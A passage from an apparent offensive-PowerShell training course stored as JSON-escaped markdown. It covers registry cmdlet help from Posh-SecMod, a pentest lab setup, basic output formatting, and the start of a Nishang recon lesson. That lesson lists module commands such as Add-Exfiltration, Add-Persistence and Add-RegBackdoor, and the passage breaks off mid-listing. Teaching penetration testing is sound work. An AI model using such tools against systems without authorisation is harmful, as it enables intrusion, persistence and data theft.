HKCU\\software\\AppDataLow\n Macromedia HKCU\\software\\Macromedia\n Microsoft HKCU\\software\\Microsoft\n Microsoft Corporation HKCU\\software\\Microsoft Corporation\n Mine HKCU\\software\\Mine\n Policies HKCU\\software\\Policies\n RegisteredApplications HKCU\\software\\RegisteredApplications\n ThinPrint HKCU\\software\\ThinPrint\n VMware, Inc. HKCU\\software\\VMware, Inc.\n Wow6432Node HKCU\\software\\Wow6432Node\n Classes HKCU\\software\\Classes\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Get-RegKeySecurityDescriptor -Examples\n\nNAME\n Get-RegKeySecurityDescriptor\n\nSYNOPSIS\n Gets the Security DACL and Owner of a given Registry Key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Get the DACL for the SAM key in HKLM\n\n\n PS C:\\> Get-RegKeySecurityDescriptor -Hive HKlm -Key sam\n\n Trustee Permission\n\n ------- ----------\n\n BUILTIN\\Administrators Owner\n\n BUILTIN\\Users Read Access\n\n BUILTIN\\Administrators All Access\n\n NT AUTHORITY\\SYSTEM All Access\n\n \\CREATOR OWNER All Access\n\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Read Access\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Get-RegValue -Examples\n\nNAME\n Get-RegValue\n\nSYNOPSIS\n Retrives a the content of a specified value in a given key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Getting the Windows Version fromt the registry\n\n\n PS C:\\> Get-RegValue -Hive HKLM -key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" -Name ProductName\n Windows 8 Enterprise\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>Read registry binary data and turn it in to ASCII String\n\n\n PS C:\\> $bindata = Get-RegValue -Hive HKCU -Key _deleteme -Name binval\n PS C:\\> ([System.Text.Encoding]::ASCII).GetString($bindata)\n PowerShell\n\n PS C:\\Wind\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help New-RegKey -Examples\n\nNAME\n New-RegKey\n\nSYNOPSIS\n Creates a registry key under a given Registry Key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Create a key named _deleteme under the registry HKCU key.\n\n\n PS C:\\> New-RegKey -Hive HKCU -Key _deleteme -Verbose\n VERBOSE: Key HKCU\\_deleteme was created.\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Remove-RegKey -Examples\n\nNAME\n Remove-RegKey\n\nSYNOPSIS\n Removes a registry key under a given Registry Key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Remove a key named _deleteme under the registry HKCU key.\n\n\n PS C:\\> Remove-RegKey -Hive HKCU -Key _deleteme -Verbose\n VERBOSE: Key HKCU\\_deleteme was removed.\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Remove-RegValue -Examples\n\nNAME\n Remove-RegValue\n\nSYNOPSIS\n Removes a specified value in a given key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Removing a value from the registry\n\n\n PS C:\\> Remove-RegValue -Hive HKCU -Key _deleteme -Name dworval -Verbose\n VERBOSE: Value dworval has been removed.\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Set-RegValue -Examples\n\nNAME\n Set-RegValue\n\nSYNOPSIS\n Set a value on a given key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>set a SZ value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name stringval -Type SZ -Data \"data\" -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\stringval of type SZ\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>Set a MULTISZ value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name multistring -Type MULTISZ -Data \"str1\",\"str2\",\"str3\" -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\multistring of type MULTISZ\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n C:\\PS>Set a QWORD value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name qval -Type QWORD -Data 4060 -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\qval of type QWORD\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n C:\\PS>Set a EXPANDSZ value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name expanval -Type EXPANDSZ -Data \"%envvar%\" -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\expanval of type EXPANDSZ\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n C:\\PS>Set a DWORD value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name dworval -Type DWORD -Data 10 -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\dworval of type DWORD\n\n\n\n\n -------------------------- EXAMPLE 6 --------------------------\n\n C:\\PS>Set a Binary value.\n\n\n PS C:\\> Set-RegValue -Hive HKCU -Key _deleteme -Name binval -Type BINARY -Data @([char[]]'PowerShell') -Verbose\n VERBOSE: Value set on HKCU\\_deletme\\binval of type BINARY\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry> Get-Help Test-RegKeyAccess -Examples\n\nNAME\n Test-RegKeyAccess\n\nSYNOPSIS\n Checks for specific access type on a given registry key.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS C:\\>Test-RegKeyAccess -Hive hkcu -Key software -AccessType DELETE\n\n\n True\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master\\Registry>\n```\n\n###### Exercise\n\n- Try the ```Macro Security script``` from previous exercise on a remote computer.\n" }, { "path": "39-Pentest-Methodology.md", "content": "#### 39. Pentest Methodology\n\n###### Penetration Testing is cyclic\n\n![Image of Penetration](images/39/penmet.jpeg)\n\n###### Lab Setup\r\r- Use (at least) a Windows Domain Controller and couple of domain member computers\r- Or use [Amazon’s t1.micro](http://aws.amazon.com/ec2/) Windows instances for free\n\n - Step 1\n - [How to install Windows Server 2012 R2 Domain Controller (Step By Step guide)](https://www.youtube.com/watch?v=TeB7yJE2plI)\n \n ![Image of Win-2k12-R2](images/39/1.jpeg)\n ![Image of Win-2k12-R2](images/39/2.jpeg)\n ![Image of Win-2k12-R2](images/39/3.jpeg)\n\n - Step 2\n - [How to Join Client to a Active Directory Domain in Windows Server 2012](https://www.youtube.com/watch?v=w8LRLkdWwc4)\n - [Join Windows 7 Computer to Windows Server 2008 Active Directory Domain](https://www.youtube.com/watch?v=jUUjAkjzV9U)\n\n ![Image of Win7](images/39/4.jpeg)\n ![Image of Win7](images/39/5.jpeg)\n\n###### Tools Required for Offensive PowerShell\n\r- [Nishang](https://github.com/samratashok/nishang)\n- [PowerSploit](https://github.com/mattifestation/PowerSploit)\n- [PowerTools](https://github.com/Veil-Framework/PowerTools)\n- [Posh-SecMod](https://github.com/darkoperator/Posh-SecMod/)" }, { "path": "4-Output-Formatting.md", "content": "#### 4. Output Formatting\n\n###### Output Formatting\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet -Name Format*\n\nCommandType Name\n----------- ----\nCmdlet Format-Custom\nCmdlet Format-List\nCmdlet Format-Table\nCmdlet Format-Wide\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-ChildItem``` is similar to ```dir``` / ```ls```\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem\n\n\n Directory: C: \\ Users \\ Windows-32\n\n\nLastWriteTime Length Length\n---- ------------- ------ ----\nDr-- 5/28/2017 11:33 AM Contacts\nDr-- 7/4/2017 12:40 PM Desktop\nDr-- 5/28/2017 11:33 AM Documents\nDr-- 7/4/2017 1:53 PM Downloads\nDr-- 5/28/2017 11:57 AM Favorites\nDr-- 5/28/2017 11:33 AM Links\nDr-- 5/28/2017 11:33 AM Music\nDr-- 5/28/2017 11:33 AM\nDr-- 5/28/2017 11:33 AM Saved Games\nDr-- 5/28/2017 11:33 AM Searches\nDr-- 5/28/2017 11:33 AM Videos\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-ChildItem``` with ```Format-Table``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-Table\n\n\n Directory: C: \\ Users \\ Windows-32\n\n\nLastWriteTime Length Length\n---- ------------- ------ ----\nDr-- 5/28/2017 11:33 AM Contacts\nDr-- 7/4/2017 12:40 PM Desktop\nDr-- 5/28/2017 11:33 AM Documents\nDr-- 7/4/2017 1:53 PM Downloads\nDr-- 5/28/2017 11:57 AM Favorites\nDr-- 5/28/2017 11:33 AM Links\nDr-- 5/28/2017 11:33 AM Music\nDr-- 5/28/2017 11:33 AM\nDr-- 5/28/2017 11:33 AM Saved Games\nDr-- 5/28/2017 11:33 AM Searches\nDr-- 5/28/2017 11:33 AM Videos\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Format-Table``` Cmdlet with the filter ```Name```\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-Table Name\n\nname\n----\ncontacts\nDesktop\nDocuments\nDownloads\nFavorite\nLinks\nMusic\nPictures\nSaved Games\nsearches\nvideos\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Format-Table``` Cmdlet with the filter ```*```\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-Table *\n\nPSPath\n------\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Contacts\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Desktop\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Documents\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Downloads\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Favorites\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Links\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Music\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Pictures\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Saved Games\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Searches\nMicrosoft.PowerShell.Core \\ FileSystem :: C: \\ Users \\ Windows-32 \\ Videos\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-ChildItem``` with ```Format-List``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-List\n\n\n Directory: C: \\ Users \\ Windows-32\n\n\n\nName: Contacts\nCreationTime: 5/28/2017 11:33:48 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:48 AM\n\nName: Desktop\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 7/4/2017 12:40:43 PM\nLastAccessTime: 7/4/2017 12:40:43 PM\n\nName: Documents\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName: Downloads\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 7/4/2017 1:53:34 PM\nLastAccessTime: 7/4/2017 1:53:34 PM\n\nName: Favorites\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:57:48 AM\nLastAccessTime: 5/28/2017 11:57:48 AM\n\nName: Links\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName: Music\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName:\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName: Saved Games\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName: Searches\nCreationTime: 5/28/2017 11:33:54 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\nName: Videos\nCreationTime: 5/28/2017 11:33:45 AM\nLastWriteTime: 5/28/2017 11:33:54 AM\nLastAccessTime: 5/28/2017 11:33:54 AM\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-ChildItem``` with ```Format-Wide``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-Wide\n\n\n Directory: C:\\Users\\Windows-32\n\n\n\n[Contacts]\n[Documents]\n[Favorites]\n[Music]\n[Saved Games]\n[Videos]\n\n\nPS C:\\Users\\Windows-32>\n```\n\n###### Output Manipulation\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet -Name out*\n\nCommandType Name\n----------- ----\nCmdlet Out-Default\nCmdlet Out-File\nCmdlet Out-GridView\nCmdlet Out-Host\nCmdlet Out-Null\nCmdlet Out-Printer\nCmdlet Out-String\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-Process``` with ```Out-GridView``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Process | Out-GridView\n```\n\n![Image of Out-GridView](images/1.jpeg)\n\n- ```Get-Process``` with ```Out-File``` Cmdlet\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Process | Out-File -FilePath C:\\Users\\Windows-32\\process.txt\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Content .\\process.txt\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 21 2 1748 1068 27 0.01 2932 cmd\n 53 3 196652 198600 233 6.71 1508 conhost\n 53 3 872 2016 43 0.06 2988 conhost\n 374 5 1096 1128 29 340 csrss\n 290 10 1364 5240 113 384 csrss\n 70 3 976 1496 36 0.02 1936 dwm\n 759 24 24516 18864 188 2.57 988 explorer\n 394 30 189996 167472 478 35.60 3484 firefox\n 813 33 147112 141012 613 30.71 3620 firefox\n 0 0 0 12 0 0 Idle\n 60 3 2024 1060 51 0.00 1184 jusched\n 731 12 2948 2796 29 480 lsass\n 146 4 1184 1024 14 488 lsm\n 101 6 11280 14632 87 1.20 2752 notepad++\n 735 15 77228 80980 283 4.91 2072 powershell\n 147 6 15172 12164 122 3188 PresentationFontCache\n 134 5 6372 3148 60 0.26 2244 python\n 641 16 19312 7924 90 1852 SearchIndexer\n 197 7 3852 2748 29 468 services\n 29 1 216 200 3 264 smss\n 289 9 4352 1668 55 1316 spoolsv\n 349 6 2640 2056 31 592 svchost\n 251 8 2032 2028 23 708 svchost\n 566 14 13356 5244 74 756 svchost\n 517 13 31336 29092 95 880 svchost\n 1084 29 15168 11728 130 920 svchost\n 443 17 5544 4332 46 1116 svchost\n 371 13 8436 3480 53 1220 svchost\n 307 24 8664 3660 43 1352 svchost\n 365 16 5180 3628 73 1452 svchost\n 352 23 45304 13420 206 1728 svchost\n 96 7 1204 520 22 1912 svchost\n 355 13 7972 5472 59 2568 svchost\n 567 0 44 112 2 4 System\n 184 9 6684 2940 45 0.08 1924 taskhost\n 115 5 1488 1796 44 656 VBoxService\n 141 5 1300 2400 57 0.09 1520 VBoxTray\n 73 5 920 204 29 376 wininit\n 114 4 1392 768 35 412 winlogon\n 419 15 8024 7256 104 728 wmpnetwk\n 91 4 1168 1688 53 0.03 2680 wuauclt\n\n\nPS C:\\Users\\Windows-32>\n```\n\n###### Output Formatting and Manipulation\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-ChildItem | Format-List * | Out-File -FilePath process2.txt\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Content .\\process2.txt\n\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Contacts\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Contacts\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Contacts\nMode : d-r--\nName : Contacts\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Contacts\nExtension :\nCreationTime : 5/28/2017 11:33:48 AM\nCreationTimeUtc : 5/28/2017 6:33:48 PM\nLastAccessTime : 5/28/2017 11:33:48 AM\nLastAccessTimeUtc : 5/28/2017 6:33:48 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Desktop\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Desktop\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Desktop\nMode : d-r--\nName : Desktop\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Desktop\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 7/4/2017 12:40:43 PM\nLastAccessTimeUtc : 7/4/2017 7:40:43 PM\nLastWriteTime : 7/4/2017 12:40:43 PM\nLastWriteTimeUtc : 7/4/2017 7:40:43 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Documents\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Documents\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Documents\nMode : d-r--\nName : Documents\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Documents\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Downloads\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Downloads\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Downloads\nMode : d-r--\nName : Downloads\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Downloads\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 7/4/2017 1:53:34 PM\nLastAccessTimeUtc : 7/4/2017 8:53:34 PM\nLastWriteTime : 7/4/2017 1:53:34 PM\nLastWriteTimeUtc : 7/4/2017 8:53:34 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Favorites\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Favorites\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Favorites\nMode : d-r--\nName : Favorites\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Favorites\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:57:48 AM\nLastAccessTimeUtc : 5/28/2017 6:57:48 PM\nLastWriteTime : 5/28/2017 11:57:48 AM\nLastWriteTimeUtc : 5/28/2017 6:57:48 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Links\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Links\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Links\nMode : d-r--\nName : Links\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Links\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Music\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Music\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Music\nMode : d-r--\nName : Music\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Music\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Pictures\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Pictures\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Pictures\nMode : d-r--\nName : Pictures\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Pictures\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Saved Games\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Saved Games\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Saved Games\nMode : d-r--\nName : Saved Games\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Saved Games\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Searches\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Searches\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Searches\nMode : d-r--\nName : Searches\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Searches\nExtension :\nCreationTime : 5/28/2017 11:33:54 AM\nCreationTimeUtc : 5/28/2017 6:33:54 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\Videos\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : Videos\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : True\nBaseName : Videos\nMode : d-r--\nName : Videos\nParent : Windows-32\nExists : True\nRoot : C:\\\nFullName : C:\\Users\\Windows-32\\Videos\nExtension :\nCreationTime : 5/28/2017 11:33:45 AM\nCreationTimeUtc : 5/28/2017 6:33:45 PM\nLastAccessTime : 5/28/2017 11:33:54 AM\nLastAccessTimeUtc : 5/28/2017 6:33:54 PM\nLastWriteTime : 5/28/2017 11:33:54 AM\nLastWriteTimeUtc : 5/28/2017 6:33:54 PM\nAttributes : ReadOnly, Directory\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\process.txt\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : process.txt\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : False\nVersionInfo : File: C:\\Users\\Windows-32\\process.txt\n InternalName:\n OriginalFilename:\n FileVersion:\n FileDescription:\n Product:\n ProductVersion:\n Debug: False\n Patched: False\n PreRelease: False\n PrivateBuild: False\n SpecialBuild: False\n Language:\n\nBaseName : process\nMode : -a---\nName : process.txt\nLength : 860014\nDirectoryName : C:\\Users\\Windows-32\nDirectory : C:\\Users\\Windows-32\nIsReadOnly : False\nExists : True\nFullName : C:\\Users\\Windows-32\\process.txt\nExtension : .txt\nCreationTime : 7/6/2017 1:43:45 PM\nCreationTimeUtc : 7/6/2017 8:43:45 PM\nLastAccessTime : 7/6/2017 1:43:45 PM\nLastAccessTimeUtc : 7/6/2017 8:43:45 PM\nLastWriteTime : 7/6/2017 1:43:45 PM\nLastWriteTimeUtc : 7/6/2017 8:43:45 PM\nAttributes : Archive\n\nPSPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\\process2.txt\nPSParentPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Users\\Windows-32\nPSChildName : process2.txt\nPSDrive : C\nPSProvider : Microsoft.PowerShell.Core\\FileSystem\nPSIsContainer : False\nVersionInfo : File: C:\\Users\\Windows-32\\process2.txt\n InternalName:\n OriginalFilename:\n FileVersion:\n FileDescription:\n Product:\n ProductVersion:\n Debug: False\n Patched: False\n PreRelease: False\n PrivateBuild: False\n SpecialBuild: False\n Language:\n\nBaseName : process2\nMode : -a---\nName : process2.txt\nLength : 21562\nDirectoryName : C:\\Users\\Windows-32\nDirectory : C:\\Users\\Windows-32\nIsReadOnly : False\nExists : True\nFullName : C:\\Users\\Windows-32\\process2.txt\nExtension : .txt\nCreationTime : 7/6/2017 2:47:38 PM\nCreationTimeUtc : 7/6/2017 9:47:38 PM\nLastAccessTime : 7/6/2017 2:47:38 PM\nLastAccessTimeUtc : 7/6/2017 9:47:38 PM\nLastWriteTime : 7/6/2017 2:47:38 PM\nLastWriteTimeUtc : 7/6/2017 9:47:38 PM\nAttributes : Archive\n\n\n\nPS C:\\Users\\Windows-32>\n```\n" }, { "path": "40-Recon-and-Scanning-Part-1.md", "content": "#### 40. Recon and Scanning Part 1\n\n###### Recon and Scanning\n\n- Host Discovery\n- Port-Scan\n- Other Recon methods\n\n###### [Nishang](https://github.com/samratashok/nishang) - PowerShell for penetration testing and offensive security\n\n- Import ```Nishang```\n\n```PowerShell\nPS C:\\Users\\Administrator> cd .\\Desktop\\nishang-master\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n- List the ```commands``` exported by the module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Command -Module nishang\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Add-Exfiltration nishang\nFunction Add-Persistence nishang\nFunction Add-RegBackdoor nishang\nFunction 